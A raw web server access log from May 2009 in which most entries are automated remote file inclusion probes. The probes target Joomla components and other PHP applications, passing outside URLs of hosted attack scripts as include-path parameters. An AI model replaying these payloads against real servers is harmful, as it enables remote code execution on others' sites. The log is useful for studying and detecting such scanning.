87.106.135.14 - - [16/May/2009:02:25:25 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:02:25:25 -0400] "GET /logs/access_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:25:25 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:25:26 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:25:26 -0400] "GET /logs/access_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:25:26 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:25:26 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
194.181.2.29 - - [16/May/2009:02:25:47 -0400] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.masuccessguy.com//docs/system.doc?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
194.181.2.29 - - [16/May/2009:02:25:47 -0400] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.masuccessguy.com//docs/pifsystem?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:26:00 -0400] "GET /logs/error_log.Q108082500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:26:00 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:26:00 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:02:26:01 -0400] "GET /logs/error_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:26:03 -0400] "GET /logs/error_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:26:09 -0400] "GET /logs/error_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
209.59.12.99 - - [16/May/2009:02:26:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.249.226 - - [16/May/2009:02:26:47 -0400] "GET /logs/access_log.Q109031500%20%20//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:26:49 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:26:54 -0400] "GET /logs/error_log.Q108082500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:26:54 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:26:54 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
217.18.76.16 - - [16/May/2009:02:26:58 -0400] "GET /logs/access_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:26:59 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:26:59 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:27:03 -0400] "GET /logs/access_log.Q108051700//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:27:05 -0400] "GET /logs/error_log.Q108082500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:27:06 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:27:06 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
69.94.30.156 - - [16/May/2009:02:27:08 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:02:27:08 -0400] "GET /logs/access_log.Q108100600//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:02:27:08 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:02:27:14 -0400] "GET /logs/access_log.Q108051700//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
70.85.249.226 - - [16/May/2009:02:27:23 -0400] "GET /logs/access_log.Q108082000%20%20//?sIncPath=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:02:27:29 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.182.147.210 - - [16/May/2009:02:27:29 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
207.182.147.210 - - [16/May/2009:02:27:29 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
88.84.128.40 - - [16/May/2009:02:27:40 -0400] "GET /logs/error_log.Q108082500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:27:41 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:27:41 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:27:51 -0400] "GET /logs/access_log.Q108051700//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:28:04 -0400] "GET /logs/access_log.Q109020500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:28:04 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:28:04 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:28:35 -0400] "GET /logs/access_log.Q108112900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:28:36 -0400] "GET /logs/access_log.Q109020500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:28:36 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:28:36 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:02:28:53 -0400] "GET /logs/access_log.Q108082500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
69.94.30.156 - - [16/May/2009:02:28:54 -0400] "GET /logs/access_log.Q108100600%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:29:01 -0400] "GET /logs/access_log.Q109040700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.94.30.156 - - [16/May/2009:02:29:04 -0400] "GET /logs/access_log.Q108090100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:29:05 -0400] "GET /logs/access_log.Q108102900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:29:18 -0400] "GET /logs/access_log.Q108112900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
122.153.212.195 - - [16/May/2009:02:29:19 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:29:19 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:29:19 -0400] "GET /logs/access_log.Q108100600//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [16/May/2009:02:29:19 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:02:29:31 -0400] "GET /logs/error_log.Q109010200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:02:29:47 -0400] "GET /logs/error_log.Q109041200//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
210.166.211.194 - - [16/May/2009:02:30:08 -0400] "GET /logs/access_log.Q109050800%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fitnessconcept.at/shop/images/bla.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
87.106.135.14 - - [16/May/2009:02:30:11 -0400] "GET /logs/access_log.Q108100600//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:30:11 -0400] "GET //component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:30:11 -0400] "GET /logs//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:02:30:13 -0400] "GET /logs/access_log.Q108100600//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:30:13 -0400] "GET //component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:30:13 -0400] "GET /logs//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:30:20 -0400] "GET /logs/access_log.Q108100600//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:30:20 -0400] "GET //component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:30:21 -0400] "GET /logs//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:30:40 -0400] "GET /logs/access_log.Q109041200//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
74.52.164.18 - - [16/May/2009:02:30:59 -0400] "GET /logs/access_log.Q108051700/errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:30:59 -0400] "GET /errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:30:59 -0400] "GET /logs/errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:30:59 -0400] "GET /logs/access_log.Q108100600/errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
88.84.128.40 - - [16/May/2009:02:31:02 -0400] "GET /logs/access_log.Q109020500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:31:02 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:31:02 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
209.59.12.99 - - [16/May/2009:02:31:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [16/May/2009:02:31:41 -0400] "GET /logs/access_log.Q108112900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
74.52.164.18 - - [16/May/2009:02:31:51 -0400] "GET /logs/access_log.Q108051700/errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:31:51 -0400] "GET /errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:31:51 -0400] "GET /logs/errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:31:52 -0400] "GET /logs/access_log.Q108100600/errors.php?error=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
72.52.230.168 - - [16/May/2009:02:32:05 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:32:05 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:02:32:05 -0400] "GET /logs/access_log.Q109012300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:02:32:30 -0400] "GET /logs/access_log.Q108090100//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:02:32:43 -0400] "GET /logs/access_log.Q108090100//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:32:46 -0400] "GET /logs/access_log.Q108090100//component/option,com_comprofiler/task,usersList/Itemid,5//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
193.25.197.14 - - [16/May/2009:02:33:13 -0400] "GET /logs/access_log.Q108082100//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:02:33:58 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:02:33:58 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.240.12.4 - - [16/May/2009:02:33:58 -0400] "GET /logs/access_log.Q109032000//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
93.44.105.112 - - [16/May/2009:02:34:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
93.44.105.112 - - [16/May/2009:02:34:07 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
210.240.12.4 - - [16/May/2009:02:34:19 -0400] "GET /logs/access_log.Q108081900//admin/spaw/spaw_control.class.php?spaw_root=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:02:34:23 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/May/2009:02:34:23 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/May/2009:02:34:24 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.249.36.194 - - [16/May/2009:02:34:30 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.232.102.70 - - [16/May/2009:02:34:56 -0400] "GET /logs/access_log.Q108112100//?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:02:34:56 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:02:34:56 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 200 1557 "-" "libwww-perl/5.813"
72.30.79.49 - - [16/May/2009:02:35:39 -0400] "GET /logs/access_log.Q109051400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [16/May/2009:02:36:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.232.102.70 - - [16/May/2009:02:36:53 -0400] "GET //?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:36:53 -0400] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:02:36:53 -0400] "GET /logs/access_log.Q108112100%20%20//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
84.112.140.135 - - [16/May/2009:02:37:39 -0400] "GET //components/errors.php?error=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.820"
218.150.79.146 - - [16/May/2009:02:37:41 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
